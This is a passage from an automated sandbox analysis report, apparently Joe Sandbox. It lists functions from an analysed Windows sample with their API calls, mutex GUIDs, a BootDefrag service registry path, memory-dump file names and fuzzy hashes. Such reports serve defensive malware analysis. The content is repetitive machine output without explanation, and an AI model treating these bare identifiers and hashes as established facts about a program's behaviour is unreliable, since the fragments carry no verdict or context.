                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40F09CB5254B01AFD324CF55D841F53B7F9AB88B04F104A1DB68A87680D775F814CB55
                                                                                                                                                                                                                                                                                                Function 0045A110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                                • String ID: JD
                                                                                                                                                                                                                                                                                                • API String ID: 2645620995-1871045537
                                                                                                                                                                                                                                                                                                • Opcode ID: d7c8a22b5a3b95ab0395684fe2e0b7986e5b4f0bb175450be3ec9314f8fc8b30
                                                                                                                                                                                                                                                                                                • Instruction ID: ad4678ad3c97b32a671b7944ff25921815bdba954f40981503357140da3e9122
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c8a22b5a3b95ab0395684fe2e0b7986e5b4f0bb175450be3ec9314f8fc8b30
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C501F2B1649300AFD348CF55D891B0BBBE0AFC8700F40992EF68986290E374D949CF86
                                                                                                                                                                                                                                                                                                Function 0041A7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20registryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyW.ADVAPI32(?,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 0041A811
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: PathFileExistsW.SHLWAPI(?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: #165.SHELL32(00000000,?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • SYSTEM\CurrentControlSet\services\BootDefrag, xrefs: 0041A7E5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$#165CloseExistsFileFolderOpenSpecial
                                                                                                                                                                                                                                                                                                • String ID: SYSTEM\CurrentControlSet\services\BootDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 1591709053-3464295076
                                                                                                                                                                                                                                                                                                • Opcode ID: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a09b35f9698f17151a02b8af7ff6770b374517e2ed940df591338b91f7cf978
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02D012B0215200DAE314BBB1DC45B9E33A4EB40315F10492EB45AC1580CB7894998B6A
                                                                                                                                                                                                                                                                                                Function 00401270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateExchangeInterlocked
                                                                                                                                                                                                                                                                                                • String ID: }I
                                                                                                                                                                                                                                                                                                • API String ID: 1770991917-1906338323
                                                                                                                                                                                                                                                                                                • Opcode ID: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                                • Instruction ID: a163272bfcbb607c39215aeccd5f887c100e22747e7019c329861ded96e1c357
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64D05E2390012056CA10521ABC48FE6672CAF91360F46427EF80DF71609329A8424AAC
                                                                                                                                                                                                                                                                                                Function 004012A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 004012B2
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004012C4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteExchangeInterlocked
                                                                                                                                                                                                                                                                                                • String ID: }I
                                                                                                                                                                                                                                                                                                • API String ID: 1722977832-1906338323
                                                                                                                                                                                                                                                                                                • Opcode ID: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f44d1f4ef78c4913e9163893a1f1e1819881c729740a469ce0397d160b8c871
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1D05E678000205A9A04521ABC48CE7662CDE9536034A427EFC0DF3160D7299C428AAC
                                                                                                                                                                                                                                                                                                Function 0041A770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18synchronizationCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,{E0A52416-D56A-4c3d-BFC7-3F40E77C718E}), ref: 0041A782
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A793
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}, xrefs: 0041A779
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-1835452401
                                                                                                                                                                                                                                                                                                • Opcode ID: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                                • Instruction ID: f658fb253292798967ff69ee4118aed0b3c4d26085bed42abcbed525fae359d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80D05E383003019BEB609B30CC9979A35A0AB40742FE0887EF01FE46C0DA6CD5C48E09
                                                                                                                                                                                                                                                                                                Function 0041A730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18synchronizationCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A753
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • {4391F12D-936B-4037-9383-DCB800DF7B65}, xrefs: 0041A739
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: {4391F12D-936B-4037-9383-DCB800DF7B65}
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-3123431990
                                                                                                                                                                                                                                                                                                • Opcode ID: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                                • Instruction ID: ec8680d88669c7631082afe2fce56944a0d96bb555ced3f370f40cb7f6e8cb2a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D05E343003019BEB646B30CC9539A35A0AB40742FE0887EF01FE46D0EA6CD5D49A09